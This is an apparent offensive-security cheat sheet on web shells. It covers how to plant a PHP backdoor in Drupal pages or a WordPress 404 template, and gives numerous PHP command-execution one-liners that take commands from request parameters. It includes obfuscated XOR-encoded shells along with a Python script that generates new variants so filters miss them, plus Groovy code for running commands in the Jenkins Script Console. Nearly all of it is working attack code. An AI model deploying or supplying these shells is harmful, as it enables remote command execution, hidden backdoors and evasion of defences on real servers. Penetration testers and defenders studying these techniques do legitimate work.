WebShell
Webshells
Ready-made shells shipped with Kali (asp, aspx, cfm, jsp, perl, php subdirectories):
ls /usr/share/webshells/
Drupal
1. Enable the "PHP filter" module (part of Drupal 7 core but disabled by default; removed from core in Drupal 8, where it is a contrib module)
2. Content => Add content => Basic page, and put the PHP web shell in the body
3. Set "Text format" to "PHP code", save, then browse to the new node to trigger it
WordPress
1. Appearance => Editor ("Theme Editor" in recent versions; needs an administrator account and is hidden when wp-config.php sets DISALLOW_FILE_EDIT)
2. Select the active theme, then open the 404 Template (404.php)
3. Paste the content of /usr/share/webshells/php/simple-backdoor.php into it
4. Update File, then request any non-existent page, e.g. http://host/nonexistent?cmd=id (simple-backdoor.php reads cmd from $_REQUEST)
PHP
Regular
<?php system("whoami"); ?>
<?php echo `whoami`; // the backtick operator is shell_exec() ?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); // /e evaluates the replacement as PHP: deprecated in 5.5, removed in 7.0 ?>
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
<?php echo shell_exec("whoami"); ?>
<?php exec("ls -la", $array); print_r($array); // exec() returns only the last line, the full output lands in $array ?>
<?php system($_GET['cmd']); // parametrised: /shell.php?cmd=id ?>
<?php passthru($_GET['cmd']); // like system() but passes raw (binary-safe) output straight through ?>
If a variant produces no output, the function is probably listed in disable_functions (check phpinfo()); try another one from the list, since they rely on different functions.
Non-alphanumeric characters
PHP's ^ on two strings is a byte-wise XOR: '$<>/' ^ '{{{{' evaluates to "_GET", so $_ holds "_GET" and ${$_} is the $_GET superglobal. Both one-liners are therefore equivalent to ${_GET}[_](${_GET}[__]), i.e. $_GET['_']($_GET['__']).
Usage: http://host/websh.php?_=system&__=id
Silent version: the leading ~ turns the echoed variable name into unprintable bytes and @ suppresses warnings
<?=~$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]);
Debug version: echoes "_GET" and shows warnings
<?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);
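How the XOR trick works, and how to regenerate it for other targets, as an added Python example (not code from the original page): it reproduces '$<>/' ^ '{{{{', derives a fresh non-alphanumeric pair for any identifier, rebuilds the two one-liners above from a pair, and shows (without executing anything) what a request resolves to. The function names and the sample query _=system&__=id are assumptions for illustration.

```python
import random
from typing import Dict, Tuple

# Printable ASCII characters that are neither letters nor digits and that can sit
# inside a single-quoted PHP string without escaping (quote and backslash excluded).
NON_ALNUM = [chr(b) for b in range(0x21, 0x7F)
             if not chr(b).isalnum() and chr(b) not in "'\\"]


def xor_str(a: str, b: str) -> str:
    """Byte-wise XOR of two equal-length ASCII strings, which is what PHP's ^
    operator does on two strings."""
    if len(a) != len(b):
        raise ValueError("PHP truncates to the shorter operand; use equal lengths")
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def can_encode(target: str) -> bool:
    """True if every character of target has a non-alphanumeric XOR pair.
    Letters and '_' have one; digits do not (their XOR with any printable
    punctuation lands on a letter or a control character)."""
    return all(any(chr(ord(c) ^ ord(t)) in NON_ALNUM for c in NON_ALNUM)
               for t in target)


def find_pair(target: str, seed: int = 0) -> Tuple[str, str]:
    """Return two non-alphanumeric strings whose XOR is target, e.g. a fresh
    replacement for '$<>/' and '{{{{'.  Deterministic for a given seed so the
    same payload can be regenerated later."""
    rng = random.Random(seed)
    left, right = [], []
    for t in target:
        options = [c for c in NON_ALNUM if chr(ord(c) ^ ord(t)) in NON_ALNUM]
        if not options:
            raise ValueError(f"no printable non-alphanumeric XOR pair for {t!r}")
        a = rng.choice(options)
        left.append(a)
        right.append(chr(ord(a) ^ ord(t)))
    return "".join(left), "".join(right)


def build_webshell(a: str, b: str, silent: bool = True) -> str:
    """Emit the one-liner from the page with the XOR pair (a, b) substituted.
    With the page's own pair this reproduces the silent/debug lines exactly."""
    assign = f"$_='{a}'^'{b}';"
    if silent:
        # ~ turns the echoed variable name into unprintable bytes; @ mutes warnings
        return f"<?=~{assign}@${{$_}}[_](@${{$_}}[__]);"
    return f"<?={assign}${{$_}}[_](${{$_}}[__]);"


def resolve_call(a: str, b: str, query: Dict[str, str]) -> Tuple[str, str]:
    """Simulate, without executing anything, what PHP resolves the payload to
    for a given query string: returns (superglobal name, call expression)."""
    superglobal = xor_str(a, b)            # '_GET' for the page's pair
    func, arg = query["_"], query["__"]    # ${$_}[_] and ${$_}[__]
    return superglobal, f"{func}('{arg}')"


if __name__ == "__main__":
    # The page's own pair decodes to the name of the $_GET superglobal.
    print(xor_str("$<>/", "{{{{"))                      # _GET
    # A fresh pair for the same target and the shell built from it.
    a, b = find_pair("_GET", seed=7)
    print(a, b, xor_str(a, b))
    print(build_webshell(a, b))
    # What the request ?_=system&__=id resolves to (constructed sample query).
    print(resolve_call(a, b, {"_": "system", "__": "id"}))
```

Regenerating the pair with a different seed changes the literal bytes of the payload while keeping its behaviour, which is useful when a specific string such as '$<>/' is being matched by a filter. Note that a target containing digits cannot be encoded this way at all, so stick to plain identifiers such as _GET or _POST.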
Jenkins / Groovy
Info: one command per string. String.execute() starts the program directly, without a shell, so ";", pipes and redirections are not interpreted; to chain commands pass them through a shell explicitly, e.g. ['sh', '-c', 'whoami; id'].execute() (cmd /c on Windows).
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()          // paste into the Script Console (/script)
proc.consumeProcessOutput(sout, serr)   // capture stdout and stderr in the background
proc.waitForOrKill(1000)                // wait up to 1 s, then kill the process
println "out> $sout err> $serr"